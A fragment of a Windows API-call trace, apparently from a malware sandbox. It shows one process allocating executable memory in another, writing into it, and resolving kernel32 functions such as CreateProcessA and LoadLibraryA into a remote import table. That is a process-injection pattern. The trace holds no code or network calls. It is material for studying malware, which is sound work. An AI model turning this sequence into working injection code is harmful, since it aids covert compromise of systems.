	[0215.376] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.376] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.377] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.377] ResetEvent (hEvent=0x548) returned 1
	[0215.377] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.377] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.377] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.377] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.378] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004014, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.378] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.378] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.378] lstrlenA (lpString="lstrcatA") returned 8
	[0215.378] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.378] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749860*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749860*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.379] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.379] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.379] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.379] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.380] ResetEvent (hEvent=0x548) returned 1
	[0215.380] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.380] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.380] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.380] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.380] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.381] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004018, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.381] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.381] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.381] lstrlenA (lpString="lstrcpyA") returned 8
	[0215.381] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.381] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27498e8*, nSize=0x9, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27498e8*, lpNumberOfBytesWritten=0x128674*=0x9) returned 1
	[0215.382] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.382] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.382] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.383] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.383] ResetEvent (hEvent=0x548) returned 1
	[0215.383] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.383] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.383] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.383] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.383] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.384] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000401c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.384] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.384] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.384] lstrlenA (lpString="TerminateThread") returned 15
	[0215.384] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.384] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27498d6*, nSize=0x10, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27498d6*, lpNumberOfBytesWritten=0x128674*=0x10) returned 1
	[0215.385] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.385] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.385] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.385] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.385] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.386] ResetEvent (hEvent=0x548) returned 1
	[0215.386] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.386] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.386] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.386] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.386] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004020, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.387] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.387] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.387] lstrlenA (lpString="GetSystemDirectoryA") returned 19
	[0215.387] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.387] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27498c0*, nSize=0x14, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27498c0*, lpNumberOfBytesWritten=0x128674*=0x14) returned 1
	[0215.388] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.388] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.388] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.388] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.389] ResetEvent (hEvent=0x548) returned 1
	[0215.389] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.389] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.389] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.389] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.389] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.389] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004024, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.390] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.390] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.390] lstrlenA (lpString="Process32NextW") returned 14
	[0215.390] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.390] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27498ae*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27498ae*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.391] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.391] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.391] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.391] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.391] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.392] ResetEvent (hEvent=0x548) returned 1
	[0215.392] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.392] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.392] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.392] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.392] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.393] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004028, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.393] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.393] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.393] lstrlenA (lpString="SetConsoleOutputCP") returned 18
	[0215.393] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.393] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749964*, nSize=0x13, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749964*, lpNumberOfBytesWritten=0x128674*=0x13) returned 1
	[0215.394] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.394] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.394] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.394] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.394] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.395] ResetEvent (hEvent=0x548) returned 1
	[0215.395] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.395] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.395] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.395] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.395] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.395] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000402c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.396] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.396] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.396] lstrlenA (lpString="CreateProcessA") returned 14
	[0215.396] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.396] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x2749952*, nSize=0xf, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x2749952*, lpNumberOfBytesWritten=0x128674*=0xf) returned 1
	[0215.397] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.397] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.399] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.400] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.400] ResetEvent (hEvent=0x548) returned 1
	[0215.400] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.400] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.400] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.401] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.401] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.401] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004030, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.401] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.401] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.401] lstrlenA (lpString="HeapCreate") returned 10
	[0215.402] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.402] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27496ea*, nSize=0xb, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27496ea*, lpNumberOfBytesWritten=0x128674*=0xb) returned 1
	[0215.402] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.402] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.402] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.403] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.403] ResetEvent (hEvent=0x548) returned 1
	[0215.403] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.403] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.403] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.404] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.404] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.404] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004034, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.404] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.404] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.404] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0215.404] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.405] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x27496f8*, nSize=0x11, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x27496f8*, lpNumberOfBytesWritten=0x128674*=0x11) returned 1
	[0215.405] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.405] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.405] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.406] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.406] ResetEvent (hEvent=0x548) returned 1
	[0215.406] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.406] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.407] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.407] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.407] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.407] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x10004038, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.407] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0215.408] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0215.408] lstrlenA (lpString="LoadLibraryA") returned 12
	[0215.408] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0215.408] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x20000, lpBuffer=0x274970c*, nSize=0xd, lpNumberOfBytesWritten=0x128674 | out: lpBuffer=0x274970c*, lpNumberOfBytesWritten=0x128674*=0xd) returned 1
	[0215.408] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285f4 | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285f4*=0x70) returned 1
	[0215.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0215.408] VirtualAllocEx (hProcess=0x584, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0215.408] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x70000, lpBuffer=0x22ffa08*, nSize=0x10, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x22ffa08*, lpNumberOfBytesWritten=0x1285ec*=0x10) returned 1
	[0215.409] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614*, nSize=0x70, lpNumberOfBytesWritten=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesWritten=0x1285ec*=0x70) returned 1
	[0215.409] ResetEvent (hEvent=0x548) returned 1
	[0215.409] SignalObjectAndWait (hObjectToSignal=0x57c, hObjectToWaitOn=0x548, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0215.409] ReadProcessMemory (in: hProcess=0x584, lpBaseAddress=0x60000, lpBuffer=0x128614, nSize=0x70, lpNumberOfBytesRead=0x1285ec | out: lpBuffer=0x128614*, lpNumberOfBytesRead=0x1285ec*=0x70) returned 1
	[0215.409] VirtualFreeEx (hProcess=0x584, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.410] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0215.410] VirtualFreeEx (hProcess=0x584, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0215.410] WriteProcessMemory (in: hProcess=0x584, lpBaseAddress=0x1000403c, lpBuffer=0x128894*, nSize=0x4, lpNumberOfBytesWritten=0x1287dc | out: lpBuffer=0x128894*, lpNumberOfBytesWritten=0x1287dc*=0x4) returned 1
	[0215.410] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
